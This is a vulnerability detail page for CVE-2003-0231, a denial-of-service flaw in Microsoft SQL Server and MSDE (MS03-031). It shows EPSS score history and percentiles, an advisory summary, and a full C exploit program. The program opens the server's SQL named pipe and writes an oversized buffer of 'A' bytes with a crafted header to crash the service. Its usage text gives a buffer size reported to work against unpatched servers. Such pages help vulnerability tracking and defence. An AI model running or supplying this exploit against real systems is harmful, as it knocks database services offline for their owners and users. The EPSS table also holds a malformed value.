CVE-2003-0231 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	25.6%	–	–
2022-04-03	–	–	25.6%	–	–
2023-03-12	–	–	–	6.14%	–
2023-07-09	–	–	–	6.14%	–
2023-08-13	–	–	–	11.46%	–
2023-08-20	–	–	–	11.46%	–
2024-06-02	–	–	–	17.32%	–
2024-12-08	–	–	–	38.31%	–
2024-12-22	–	–	–	64.62%	–
2025-01-19	–	–	–	64.62%	–
2025-03-18	–	–	–	–	29.69%
2025-03-30	–	–	–	–	23.53%
2025-03-30	–	–	–	–	23.53,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	92%
2023-07-09	93%
2023-08-13	94%
2023-08-20	95%
2024-06-02	96%
2024-12-08	97%
2024-12-22	98%
2025-01-19	98%
2025-03-18	96%
2025-03-30	96%
2025-03-30	96%

source: https://www.securityfocus.com/bid/8274/info Microsoft SQL Server and the Microsoft Data Engine have been reported prone to a denial of service attack. Any local or remote user, who can authenticate and is part of the Everyone Group, may trigger a denial of service condition in an affected SQL Server. It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive. //////////////////////////////////////////////////////////////////////////////// // // exp for Microsoft SQL Server DoS(MS03-031) // // By : refdom // Email : refdom@xfocus.org // Home Page : http://www.xfocus.org // //////////////////////////////////////////////////////////////////////////////// #include <stdio.h> #include <stdlib.h> #include <windows.h> void Usage() { printf("******************************************\n"); printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n"); printf("\t Written by Refdom\n"); printf("\t Email: refdom@xfocus.org\n"); printf("\t Homepage: www.xfocus.org\n\n"); printf("Usage: DOSMSSQL.exe server buffersize\n"); printf("eg: SQLScanner.exe 192.168.0.1 9000\n\n"); printf("The buffersize depends on service pack level.\n"); printf("I test it on my server: windows 2000, mssqlserver no sp.\n"); printf("when buffersize is 9000, the server can be crashed.\n"); printf("\n"); printf("*******************************************\n\n"); } int main(int argc, char* argv[]) { char lpPipeName[50]; char *lpBuffer = NULL; unsigned long ulSize = 0; BOOL bResult; DWORD dwWritten = 0, dwMode; HANDLE hPipe; Usage(); printf("Starting...\n"); if (argc != 3) goto Exit0; if (strlen(argv[1]) < 20) { sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]); } else { printf("Error!server\n"); goto Exit0; } ulSize= atol(argv[2]); lpBuffer = (char*)malloc(ulSize + 2); if (NULL == lpBuffer) { printf("malloc error!\n"); goto Exit0; } memset(lpBuffer, 0, ulSize + 2); memset(lpBuffer, 'A', ulSize); *lpBuffer = '\x12'; *(lpBuffer + 1) = '\x01'; *(lpBuffer + 2) = '\x00'; printf("Connecting Server...\n"); hPipe = CreateFile(lpPipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (INVALID_HANDLE_VALUE == hPipe) { printf("Error!Connect server!%d\n", GetLastError()); goto Exit0; } dwMode = PIPE_READMODE_MESSAGE; bResult = SetNamedPipeHandleState( hPipe, // pipe handle &dwMode, // new pipe mode NULL, // don't set maximum bytes NULL); // don't set maximum time if (!bResult) { printf("Error!SetNamedPipeHandleState.%d\n", GetLastError()); goto Exit0; } bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL); if (!bResult) { printf("\n\tError!WriteFile.%d\n\n", GetLastError()); printf("When see the error message, the target may be crashed!!\n\n"); goto Exit0; } Exit0: return 0; }